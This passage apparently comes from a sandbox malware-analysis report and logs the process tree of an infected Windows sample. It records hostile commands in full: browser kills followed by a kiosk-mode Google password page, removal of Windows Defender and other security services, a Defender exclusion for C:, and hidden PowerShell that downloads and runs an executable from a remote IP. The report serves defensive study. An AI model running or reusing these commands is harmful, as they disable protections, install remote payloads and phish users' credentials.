        PID:5504
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        Kills process with taskkill
        
        PID:23292
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        Kills process with taskkill
        
        PID:24028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        5⤵
        Kills process with taskkill
        
        PID:24272
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:9036
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:9076
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1924 -prefsLen 27097 -prefMapHandle 1932 -prefMapSize 270321 -ipcHandle 2040 -initialChannelId {4c6df2d5-37d6-4060-a7eb-91eaec207e04} -parentPid 9076 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9076" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        7⤵
        
        PID:6324
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2460 -prefsLen 27133 -prefMapHandle 2464 -prefMapSize 270321 -ipcHandle 2472 -initialChannelId {70c216be-dbe5-488e-9ad1-a9c7945c40d5} -parentPid 9076 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9076" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        7⤵
        
        PID:4320
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3400 -prefsLen 25213 -prefMapHandle 1036 -prefMapSize 270321 -jsInitHandle 2704 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1596 -initialChannelId {200a77a7-af18-4fb2-a089-2d93cf1b4be1} -parentPid 9076 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9076" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        7⤵
        
        PID:20260
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4032 -prefsLen 27323 -prefMapHandle 4028 -prefMapSize 270321 -ipcHandle 4020 -initialChannelId {bdc59e17-1ab1-4b1b-a924-32f1a7ad2251} -parentPid 9076 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9076" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        7⤵
        
        PID:10180
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4432 -prefsLen 34822 -prefMapHandle 4436 -prefMapSize 270321 -jsInitHandle 4440 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4480 -initialChannelId {4132ca43-aeff-4366-8f52-c170a3f5e21f} -parentPid 9076 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9076" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        7⤵
        
        PID:19568
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2844 -prefsLen 34822 -prefMapHandle 2276 -prefMapSize 270321 -ipcHandle 4088 -initialChannelId {52076ae6-e9b3-4bbf-aef8-1117a58af951} -parentPid 9076 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9076" -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 gpu
        7⤵
        
        PID:9492
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 2192 -prefsLen 34903 -prefMapHandle 4956 -prefMapSize 270321 -ipcHandle 5012 -initialChannelId {81189180-f1b9-4d3b-891e-2059adcb4598} -parentPid 9076 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9076" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 utility
        7⤵
        
        PID:6856
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5212 -prefsLen 32793 -prefMapHandle 5216 -prefMapSize 270321 -jsInitHandle 5220 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5280 -initialChannelId {78221336-b613-4f5e-8155-c14f1a5ee7df} -parentPid 9076 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9076" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        7⤵
        
        PID:17904
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5232 -prefsLen 32793 -prefMapHandle 5236 -prefMapSize 270321 -jsInitHandle 5240 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5288 -initialChannelId {7332d685-eb37-4ee2-b965-7daa5c016f67} -parentPid 9076 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9076" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        7⤵
        
        PID:17884
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        Kills process with taskkill
        
        PID:8416
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        Kills process with taskkill
        
        PID:16744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        Kills process with taskkill
        
        PID:16220
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        Kills process with taskkill
        
        PID:15456
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        5⤵
        Kills process with taskkill
        
        PID:20472
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:21116
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:20896
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1868 -prefsLen 27097 -prefMapHandle 1872 -prefMapSize 270373 -ipcHandle 1972 -initialChannelId {e0eabaee-b54b-4189-91df-273ae833fcf9} -parentPid 20896 -crashReporter "\\.\pipe\gecko-crash-server-pipe.20896" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        7⤵
        
        PID:6500
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2388 -prefsLen 27133 -prefMapHandle 2392 -prefMapSize 270373 -ipcHandle 2400 -initialChannelId {f23fe229-2309-4679-8c87-d60569616d0e} -parentPid 20896 -crashReporter "\\.\pipe\gecko-crash-server-pipe.20896" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        7⤵
        
        PID:3496
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3828 -prefsLen 25213 -prefMapHandle 3832 -prefMapSize 270373 -jsInitHandle 3836 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3844 -initialChannelId {0bcea449-c433-4a88-9f87-797518f9596a} -parentPid 20896 -crashReporter "\\.\pipe\gecko-crash-server-pipe.20896" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        7⤵
        
        PID:30332
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4152 -prefsLen 27323 -prefMapHandle 4156 -prefMapSize 270373 -ipcHandle 4260 -initialChannelId {0103bbcc-a318-47f5-a0d3-e9ed7c4c76bb} -parentPid 20896 -crashReporter "\\.\pipe\gecko-crash-server-pipe.20896" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        7⤵
        
        PID:32344
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3400 -prefsLen 34822 -prefMapHandle 3416 -prefMapSize 270373 -jsInitHandle 3420 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3200 -initialChannelId {bbd21a12-6b11-4569-aa9b-d7bf5daee6ea} -parentPid 20896 -crashReporter "\\.\pipe\gecko-crash-server-pipe.20896" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        7⤵
        
        PID:11288
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 2892 -prefsLen 34822 -prefMapHandle 4456 -prefMapSize 270373 -ipcHandle 5064 -initialChannelId {6e278d92-8a47-4204-972b-c442983e915d} -parentPid 20896 -crashReporter "\\.\pipe\gecko-crash-server-pipe.20896" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        7⤵
        
        PID:8000
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4480 -prefsLen 34822 -prefMapHandle 4616 -prefMapSize 270373 -ipcHandle 5016 -initialChannelId {29ff1d57-967b-4bfb-b20f-47386ea65cb8} -parentPid 20896 -crashReporter "\\.\pipe\gecko-crash-server-pipe.20896" -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 gpu
        7⤵
        
        PID:9428
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        Kills process with taskkill
        
        PID:25464
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        Kills process with taskkill
        
        PID:15196
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        Kills process with taskkill
        
        PID:11980
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        Kills process with taskkill
        
        PID:27140
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        5⤵
        Kills process with taskkill
        
        PID:27200
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:19876
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:26744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        Kills process with taskkill
        
        PID:5776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        Kills process with taskkill
        
        PID:7920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        Kills process with taskkill
        
        PID:23440
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        Kills process with taskkill
        
        PID:13900
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        5⤵
        Kills process with taskkill
        
        PID:8724
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:24256
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:24024
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1904 -prefsLen 27097 -prefMapHandle 1908 -prefMapSize 270373 -ipcHandle 1956 -initialChannelId {2c5bd1f0-a398-4e71-8262-8bf36594fb22} -parentPid 24024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24024" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        7⤵
        
        PID:4496
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2408 -prefsLen 27133 -prefMapHandle 2412 -prefMapSize 270373 -ipcHandle 2420 -initialChannelId {73743ba3-8c6f-46e6-8299-10b8496256f8} -parentPid 24024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24024" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        7⤵
        
        PID:12996
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3396 -prefsLen 27133 -prefMapHandle 3400 -prefMapSize 270373 -ipcHandle 3408 -initialChannelId {e2997173-67ae-4af4-be7e-85fb5deb8a2d} -parentPid 24024 -crashReporter "\\.\pipe\gecko-crash-server-pipe.24024" -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 gpu
        7⤵
        
        PID:13360
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        Kills process with taskkill
        
        PID:804
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        5⤵
        Kills process with taskkill
        
        PID:8732
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        5⤵
        Kills process with taskkill
        
        PID:14752
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        5⤵
        Kills process with taskkill
        
        PID:13664
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        5⤵
        Kills process with taskkill
        
        PID:17004
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:16876
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:17760
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1528 -prefsLen 27097 -prefMapHandle 1532 -prefMapSize 270373 -ipcHandle 1624 -initialChannelId {1c6a46e3-2e77-406f-ac98-99cf6416fbb8} -parentPid 17760 -crashReporter "\\.\pipe\gecko-crash-server-pipe.17760" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        7⤵
        
        PID:13864
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        7⤵
        
        PID:14820
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        
        PID:22192
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        5⤵
        Kills process with taskkill
        
        PID:16860
  - - C:\Users\Admin\AppData\Local\Temp\10484050101\92e324cbed.exe
      "C:\Users\Admin\AppData\Local\Temp\10484050101\92e324cbed.exe"
      4⤵
      PID:11328
    - - C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe"
        5⤵
        
        PID:32388
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7A8.tmp\7A9.tmp\7AA.bat C:\Users\Admin\AppData\Local\Temp\272.exe"
        6⤵
        
        PID:26232
        
        C:\Users\Admin\AppData\Local\Temp\272.exe
        
        "C:\Users\Admin\AppData\Local\Temp\272.exe" go
        7⤵
        
        PID:23320
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\241A.tmp\241B.tmp\241C.bat C:\Users\Admin\AppData\Local\Temp\272.exe go"
        8⤵
        
        PID:23684
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        9⤵
        Launches sc.exe
        
        PID:2960
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        9⤵
        Launches sc.exe
        
        PID:10200
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        9⤵
        Delays execution with timeout.exe
        
        PID:8984
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        9⤵
        Launches sc.exe
        
        PID:5468
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        9⤵
        Launches sc.exe
        
        PID:6300
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8196
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:20244
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        9⤵
        Launches sc.exe
        
        PID:10976
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        9⤵
        Launches sc.exe
        
        PID:6984
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        9⤵
        
        PID:7928
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        9⤵
        Launches sc.exe
        
        PID:17548
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        9⤵
        Launches sc.exe
        
        PID:17228
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        9⤵
        
        PID:16780
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        9⤵
        Launches sc.exe
        
        PID:16528
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        9⤵
        Launches sc.exe
        
        PID:16316
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        9⤵
        
        PID:15976
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        9⤵
        Launches sc.exe
        
        PID:15344
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        9⤵
        Launches sc.exe
        
        PID:6088
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        9⤵
        
        PID:31620
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        9⤵
        Launches sc.exe
        
        PID:22132
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        9⤵
        Launches sc.exe
        
        PID:21412
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        9⤵
        
        PID:20624
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        9⤵
        Launches sc.exe
        
        PID:10680
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        9⤵
        Launches sc.exe
        
        PID:9336
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        9⤵
        
        PID:6204
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        9⤵
        Launches sc.exe
        
        PID:11508
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        9⤵
        Launches sc.exe
        
        PID:15284
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        9⤵
        
        PID:6216
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        9⤵
        Launches sc.exe
        
        PID:7028
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        9⤵
        Launches sc.exe
        
        PID:12248
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        9⤵
        
        PID:31332
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        9⤵
        Launches sc.exe
        
        PID:26344
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        9⤵
        Launches sc.exe
        
        PID:26652
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        9⤵
        
        PID:26984
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        9⤵
        Launches sc.exe
        
        PID:30416
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        9⤵
        Launches sc.exe
        
        PID:27888
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        9⤵
        
        PID:7860
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        9⤵
        Launches sc.exe
        
        PID:28812
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        9⤵
        Launches sc.exe
        
        PID:26076
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        9⤵
        
        PID:10692
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        9⤵
        Launches sc.exe
        
        PID:15128
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        9⤵
        Launches sc.exe
        
        PID:25468
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        9⤵
        
        PID:11176
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        9⤵
        Launches sc.exe
        
        PID:14912
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        9⤵
        Launches sc.exe
        
        PID:31164
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        9⤵
        
        PID:23228
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        9⤵
        Launches sc.exe
        
        PID:20180
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        9⤵
        Launches sc.exe
        
        PID:12456
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        9⤵
        
        PID:23256
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        9⤵
        Launches sc.exe
        
        PID:9160
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        9⤵
        Launches sc.exe
        
        PID:24112
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        9⤵
        
        PID:5200
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        9⤵
        Launches sc.exe
        
        PID:7152
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        9⤵
        Launches sc.exe
        
        PID:13936
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        9⤵
        
        PID:10252
  - - C:\Users\Admin\AppData\Local\Temp\10484090101\23992c2af1.exe
      "C:\Users\Admin\AppData\Local\Temp\10484090101\23992c2af1.exe"
      4⤵
      PID:23252
  - - C:\Users\Admin\AppData\Local\Temp\10484130101\196a2a1058.exe
      "C:\Users\Admin\AppData\Local\Temp\10484130101\196a2a1058.exe"
      4⤵
      PID:9028
  - - C:\Users\Admin\AppData\Local\Temp\10484210101\7142e0289f.exe
      "C:\Users\Admin\AppData\Local\Temp\10484210101\7142e0289f.exe"
      4⤵
      PID:31932
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn EIyAzmaFsd7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\WhbFyh5kH.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        
        PID:9476
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn EIyAzmaFsd7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\WhbFyh5kH.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:17384
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\WhbFyh5kH.hta
        5⤵
        
        PID:19412
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IY8L71JCAFFLOQPJB6WG0ORWUHJIEELA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7836
        
        C:\Users\Admin\AppData\Local\TempIY8L71JCAFFLOQPJB6WG0ORWUHJIEELA.EXE
        
        "C:\Users\Admin\AppData\Local\TempIY8L71JCAFFLOQPJB6WG0ORWUHJIEELA.EXE"
        7⤵
        
        PID:22076
  - - C:\Users\Admin\AppData\Local\Temp\10484220101\25bd778d6f.exe
      "C:\Users\Admin\AppData\Local\Temp\10484220101\25bd778d6f.exe"
      4⤵
      PID:17116
  - - C:\Users\Admin\AppData\Local\Temp\10484230101\9d5c5a1067.exe
      "C:\Users\Admin\AppData\Local\Temp\10484230101\9d5c5a1067.exe"
      4⤵
      PID:15992
    - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10484230101\9d5c5a1067.exe"
        5⤵
        
        PID:15308
  - - C:\Users\Admin\AppData\Local\Temp\10484240101\ad9ac7249f.exe
      "C:\Users\Admin\AppData\Local\Temp\10484240101\ad9ac7249f.exe"
      4⤵
      PID:5680
    - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10484240101\ad9ac7249f.exe"
        5⤵
        
        PID:4156
  - - C:\Users\Admin\AppData\Local\Temp\10484250101\f7e206d59d.exe
      "C:\Users\Admin\AppData\Local\Temp\10484250101\f7e206d59d.exe"
      4⤵
      PID:22192
  - - C:\Users\Admin\AppData\Local\Temp\10484260101\CmvdYC4.exe
      "C:\Users\Admin\AppData\Local\Temp\10484260101\CmvdYC4.exe"
      4⤵
      PID:10716
    - - C:\Users\Admin\AppData\Local\Temp\onefile_10716_133884504375232997\ZSoeRVBe.exe
        
        C:\Users\Admin\AppData\Local\Temp\10484260101\CmvdYC4.exe
        5⤵
        
        PID:25104
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "Get-WmiObject -Query \"Select * from Win32_CacheMemory\""
        6⤵
        
        PID:15148
  - - C:\Users\Admin\AppData\Local\Temp\10484270101\UZPt0hR.exe
      "C:\Users\Admin\AppData\Local\Temp\10484270101\UZPt0hR.exe"
      4⤵
      PID:11760
    - - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        
        PID:15248
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:27912
    - - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        5⤵
        
        PID:15224
      - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        6⤵
        
        PID:31700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
